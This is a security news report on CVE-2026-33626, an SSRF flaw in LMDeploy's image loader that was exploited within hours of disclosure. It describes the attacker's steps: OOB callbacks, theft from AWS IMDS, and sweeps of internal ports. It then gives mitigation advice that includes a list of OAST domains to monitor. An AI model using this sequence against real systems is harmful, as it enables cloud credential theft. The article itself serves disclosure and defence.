LMDeploy LLM Engine SSRF (CVE-2026-33626) Exploited Within 12 Hours
A newly-disclosed Server-Side Request Forgery flaw in the LMDeploy LLM inference-serving toolkit is already under active exploitation, with attackers using a vision-language-module endpoint as an SSRF primitive to probe AWS IMDS, internal databases, and admin planes within minutes of patch availability.
SHANGHAI, CHINA — The window between a vulnerability disclosure and its first real-world exploitation is collapsing. In the case of CVE-2026-33626, a high-severity flaw in the open-source LMDeploy toolkit, that window was just 12 hours and 31 minutes.
Researchers from Sysdig Threat Research observed the first exploitation attempts against honeypots shortly after the GitHub Security Advisory (GHSA) went live on April 22. The speed of the attack suggests that threat actors are no longer waiting for public Proof-of-Concept (PoC) code; instead, they are using advisory text as a blueprint to build their own exploits in near real-time.
The Vision-Language Primitive
The vulnerability (CVSS 7.5) resides in LMDeploy’s vision-language module — specifically within the load_image() function in lmdeploy/vl/utils.py. The function was designed to fetch images from URLs for model processing but failed to validate whether those URLs pointed to internal or private IP addresses.
By sending a specially crafted request to an exposed LMDeploy inference endpoint, an attacker can turn the AI server into a proxy. This creates a powerful Server-Side Request Forgery (SSRF) primitive, allowing the attacker to "see" and interact with the internal network from the perspective of the trusted inference node.
Anatomy of an 8-Minute Intrusion
During the observed exploitation window, the attacker followed a classic cloud-post-exploitation playbook tailored for the AI stack:
- Egress Confirmation: The attacker initiated an out-of-band (OOB) DNS callback to a service like
requestrepo.comto confirm the SSRF was working and that the server could communicate with the outside world. - Cloud Metadata Theft: The attacker immediately targeted the AWS Instance Metadata Service (IMDS) at
169.254.169.254. This is a primary target for harvesting IAM credentials and cloud environment details. - Internal Port Sweeping: In a rapid sweep, the attacker probed
localhostand local network segments for common administrative services, including:- Redis & MySQL: Targeting internal data stores for potential exfiltration.
- Admin HTTP Planes: Searching for unauthenticated internal dashboards on ports like
8080or80.
The CyberSignal Analysis: Strategic Signals
Signal 01 — The Demise of the Patch Cycle
The 12-hour exploitation window for CVE-2026-33626 renders traditional "Patch Tuesday" cadences obsolete. For organizations deploying AI infrastructure, a new advisory must now be treated as an immediate remediation event. Attackers are effectively "reverse-engineering" advisories into exploits before many security teams have even triaged the alert.
Signal 02 — AI Endpoints as High-Value Proxies
Inference engines like LMDeploy are designed to be user-facing, often integrated into chat UIs or API clients. Because they require rich network access — to fetch model weights from S3 or logs to a central server — they are the perfect SSRF jump-points into a cloud environment.
Signal 03 — The "Blueprinting" Trend
The absence of a public PoC at the time of exploitation confirms that sophisticated actors are increasingly independent. By analyzing the GitHub diffs and advisory descriptions, they can weaponize a flaw like CVE-2026-33626 across the application security landscape at scale.
Defender Guidance: Tactical Mitigation & Hardening
While immediate patching to v0.12.3 is the primary directive, the speed of exploitation for CVE-2026-33626 necessitates a "Defense in Depth" approach. Because the vision-language module acts as an SSRF primitive, defenders should implement the following environmental controls:
- Enforce IMDSv2: If running on AWS, transition all inference nodes to Instance Metadata Service Version 2 (IMDSv2) with a hop limit of 1. This prevents the classic "one-shot" credential theft seen in this incident by requiring a session-oriented
PUTrequest that SSRF primitives often cannot easily replicate. - Egress Filtering (Allow-listing): Inference engines are often over-permissioned. Restrict outbound traffic from LMDeploy nodes to a strict allow-list of model artifact repositories (e.g., specific S3 buckets) and logging endpoints. Explicitly block access to the loopback address (
127.0.0.1) and private IP ranges (10.0.0.0/8,172.16.0.0/12,192.168.0.0/16) at the host firewall or security group level. - Network Namespace Isolation: Run LMDeploy within a containerized environment (like Docker or Kubernetes) using a non-default bridge network. Ensure the container does not have access to the host's networking stack (
--net=hostshould be strictly forbidden). - OAST Monitoring: Monitor network telemetry for requests to known Out-of-Band Application Security Testing (OAST) domains (e.g.,
interactsh,burpcollaborator,requestrepo). The 8-minute intrusion sequence showed that attackers use these for reachability confirmation before moving to credential theft.